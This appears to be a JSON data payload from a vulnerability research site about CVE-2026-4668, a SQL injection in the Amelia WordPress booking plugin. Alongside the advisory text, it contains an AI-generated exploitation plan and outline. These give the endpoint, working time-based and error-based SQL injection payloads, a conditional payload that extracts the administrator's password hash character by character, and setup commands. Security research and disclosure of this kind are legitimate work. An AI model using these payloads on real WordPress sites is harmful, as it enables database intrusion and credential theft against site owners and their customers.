[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7h7oClkiDZqp3xRTvGqTJAuZkKU9EpIJSzIb-sjnziE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-4668","amelia-authenticated-manager-sql-injection-via-sort-parameter","Amelia \u003C= 2.1.2 - Authenticated (Manager+) SQL Injection via 'sort' Parameter","The Booking for Appointments and Events Calendar - Amelia plugin for WordPress is vulnerable to SQL Injection via the `sort` parameter in the payments listing endpoint in all versions up to, and including, 2.1.2. This is due to insufficient escaping on the user-supplied `sort` parameter and lack of sufficient preparation on the existing SQL query in `PaymentRepository.php`, where the sort field is interpolated directly into an ORDER BY clause without sanitization or whitelist validation. PDO prepared statements do not protect ORDER BY column names. GET requests also skip Amelia's nonce validation entirely. This makes it possible for authenticated attackers, with Manager-level (`wpamelia-manager`) access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via time-based blind SQL injection.","ameliabooking",null,"\u003C=2.1.2","2.1.3","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-31 10:30:53","2026-03-31 23:25:46",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1bfc5467-6610-4516-8c50-d47d05e2677d?source=api-prod",1,[22,23,24,25,26,27,28,29],"ameliabooking.php","languages\u002Far\u002Fameliabooking-ar.po","languages\u002Fca\u002Fameliabooking-ca.po","languages\u002Fcs_CZ\u002Fameliabooking-cs_CZ.po","languages\u002Fda_DK\u002Fameliabooking-da_DK.po","languages\u002Fde_AT\u002Fameliabooking-de_AT.po","languages\u002Fde_CH\u002Fameliabooking-de_CH.po","languages\u002Fde_DE\u002Fameliabooking-de_DE.po","researched",false,3,"# Exploitation Research Plan - CVE-2026-4668 (Amelia SQL Injection)\n\n## 1. Vulnerability Summary\nThe Amelia Booking plugin for WordPress is vulnerable to an authenticated SQL injection via the `sort` parameter in its payments listing API endpoint. The vulnerability exists in `PaymentRepository.php`, where the `sort` parameter provided by the user is directly interpolated into an SQL `ORDER BY` clause without sufficient sanitization, escaping, or whitelist validation. Because PDO prepared statements do not support parameterization of column names or identifiers in the `ORDER BY` clause, the input remains active SQL. Furthermore, GET requests to the Amelia API skip nonce validation, allowing authenticated users with the `wpamelia-manager` role to perform time-based blind SQL injection.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php?action=wpamelia_api&call=\u002Fpayments`\n- **Method:** `GET` (Specifically used to bypass nonce validation as mentioned in the description).\n- **Vulnerable Parameter:** `sort`\n- **Required Role:** `wpamelia-manager` (Manager level and above).\n- **Preconditions:** The plugin must be active, and at least one payment record should ideally exist in the database to ensure the `ORDER BY` clause is evaluated during query execution.\n\n## 3. Code Flow\n1. **Entry Point:** A `GET` request is sent to `admin-ajax.php` with `action=wpamelia_api`.\n2. **Hook Registration:** `Plugin::wpAmeliaApiCall()` is triggered by the `wp_ajax_wpamelia_api` and `wp_ajax_nopriv_wpamelia_api` hooks (via the `AMELIA_ACTION_SLUG` defined in `ameliabooking.php`).\n3. **Routing:** `Plugin::wpAmeliaApiCall()` initializes the Slim application and calls `Routes::routes($app, $container)`.\n4. **Endpoint Dispatch:** The Slim router matches the `call=\u002Fpayments` parameter to the payment listing controller.\n5. **Processing:** The request reaches `PaymentApplicationService` and eventually `PaymentRepository`.\n6. **Sink:** In `PaymentRepository.php`, the value of the `sort` parameter is retrieved from the request and concatenated directly into the `$query` string before being executed via `$this->db->query()` or `$this->db->get_results()`.\n   - *Conceptual Sink:* `$sql = \"SELECT ... FROM ... ORDER BY \" . $params['sort'] . \" \" . $params['order'];`\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description: **\"GET requests also skip Amelia's nonce validation entirely.\"**\n\nTherefore, no nonce acquisition is required for this specific exploit. The attacker only needs a valid session cookie for a user with the `wpamelia-manager` capability.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate a time-based blind SQL injection by inducing a 5-second delay.\n\n### Step 1: Authentication\nAuthenticate as a user with the `wpamelia-manager` role and capture the session cookies.\n\n### Step 2: Trigger Time-Based Injection\nConstruct a request to the `\u002Fpayments` endpoint. We will inject a subquery into the `sort` parameter that triggers `SLEEP()`.\n\n**Payload Structure:**\n`id,(SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n\n**Full Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php?action=wpamelia_api&call=\u002Fpayments&sort=id,(SELECT 1 FROM (SELECT(SLEEP(5)))a)&order=ASC`\n- **Method:** `GET`\n- **Headers:** \n  - `Cookie: [Manager_Cookies]`\n  - `X-Requested-With: XMLHttpRequest`\n\n### Step 3: Data Extraction (Proof of Concept)\nTo prove data can be extracted, we can use a conditional sleep to check if the first character of the admin's password hash (typically `$P$` for phpass or `$wp$` for bcrypt) matches a specific character.\n\n**Payload:**\n`sort=IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)=0x24,SLEEP(5),id)`\n*(0x24 is '$')*\n\n## 6. Test Data Setup\n1. **Create Manager User:**\n   ```bash\n   wp user create attacker attacker@example.com --role=subscriber --user_pass=password\n   wp user cap add attacker wpamelia-manager\n   ```\n2. **Ensure Payment Data Exists:**\n   The `ORDER BY` clause must execute. If the `wp_amelia_payments` table is empty, the injection might not trigger a delay in some MySQL versions.\n   ```bash\n   # Create a dummy customer\n   wp db query \"INSERT INTO wp_amelia_users (firstName, lastName, email, type) VALUES ('Test', 'Customer', 'customer@example.com', 'customer');\"\n   # Get the ID of the inserted user (assume 2)\n   # Create a dummy payment record\n   wp db query \"INSERT INTO wp_amelia_payments (amount, dateTime, status, customerId, type) VALUES (10.00, NOW(), 'paid', 2, 'appointment');\"\n   ```\n\n## 7. Expected Results\n1. **Baseline Request:** A request with `sort=id` should return immediately (e.g., \u003C 200ms).\n2. **Attack Request:** A request with the `SLEEP(5)` payload should take approximately 5 seconds to respond.\n3. **Response Body:** Should contain a JSON object representing the payments list (even if empty, the time delay confirms the injection).\n\n## 8. Verification Steps\n1. **Time measurement:** Use the `http_request` tool's response metadata to confirm `elapsed_time` >= 5.0 seconds.\n2. **Database Integrity:** Verify that the dummy payment exists using:\n   ```bash\n   wp db query \"SELECT count(*) FROM wp_amelia_payments;\"\n   ```\n3. **Error Check:** Check `wp-content\u002Fdebug.log` (if enabled) to see if the query failed or if the injection was logged.\n\n## 9. Alternative Approaches\nIf the `ORDER BY` injection requires a more complex syntax, try:\n- **Boolean-based:** `sort=(CASE WHEN (1=1) THEN id ELSE amount END)`. Compare the order of results when the condition is true vs. false.\n- **Alternative Time-based Syntax:**\n  - `sort=id AND (SELECT 2134 FROM (SELECT(SLEEP(5)))b)`\n  - `sort=SLEEP(5)` (If the query allows a raw function call in ORDER BY).\n- **Error-based (if `WP_DEBUG` is on):**\n  - `sort=updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)`","The Amelia Booking plugin for WordPress is vulnerable to an authenticated time-based blind SQL injection via the 'sort' parameter in its payments listing API endpoint. This occurs because the plugin directly interpolates user-supplied sort criteria into an SQL ORDER BY clause without sufficient validation or whitelisting. Authenticated users with Manager-level permissions or higher can exploit this, as GET requests to the Amelia API skip nonce validation entirely.","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fameliabooking\u002F2.1.2\u002Fameliabooking.php\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fameliabooking\u002F2.1.3\u002Fameliabooking.php\n@@ -3,7 +3,7 @@\n Plugin Name: Amelia\n Plugin URI: https:\u002F\u002Fwpamelia.com\u002F\n Description: Amelia is a simple yet powerful automated booking specialist, working 24\u002F7 to make sure your customers can make appointments and events even while you sleep!\n-Version: 2.1.2\n+Version: 2.1.3\n Author: Melograno Ventures\n Author URI: https:\u002F\u002Fmelograno.io\u002F\n Text Domain: ameliabooking\n@@ -109,7 +111,7 @@\n \n \u002F\u002F Const for Amelia version\n if (!defined('AMELIA_VERSION')) {\n-    define('AMELIA_VERSION', '2.1.2');\n+    define('AMELIA_VERSION', '2.1.3');\n }\n \n \u002F\u002F Const for site URL\n... (truncated)","1. Authenticate to the WordPress site as a user with the 'wpamelia-manager' role.\n2. Access the payments listing endpoint at '\u002Fwp-admin\u002Fadmin-ajax.php?action=wpamelia_api&call=\u002Fpayments' using a GET request (to bypass nonce checks).\n3. Use the 'sort' parameter to inject a time-based SQL payload into the ORDER BY clause, such as: 'id,(SELECT 1 FROM (SELECT(SLEEP(5)))a)'.\n4. Observe the response delay; a delay of approximately 5 seconds confirms the existence of the vulnerability.\n5. To extract data, utilize conditional logic within the injection (e.g., 'IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)=char(36),SLEEP(5),id)') to leak database contents character-by-character based on the presence or absence of a response delay.","gemini-3-flash-preview","2026-04-17 21:59:38","2026-04-17 22:00:07",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","2.1.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fameliabooking\u002Ftags\u002F2.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fameliabooking.2.1.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fameliabooking\u002Ftags\u002F2.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fameliabooking.2.1.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fameliabooking\u002Ftags"]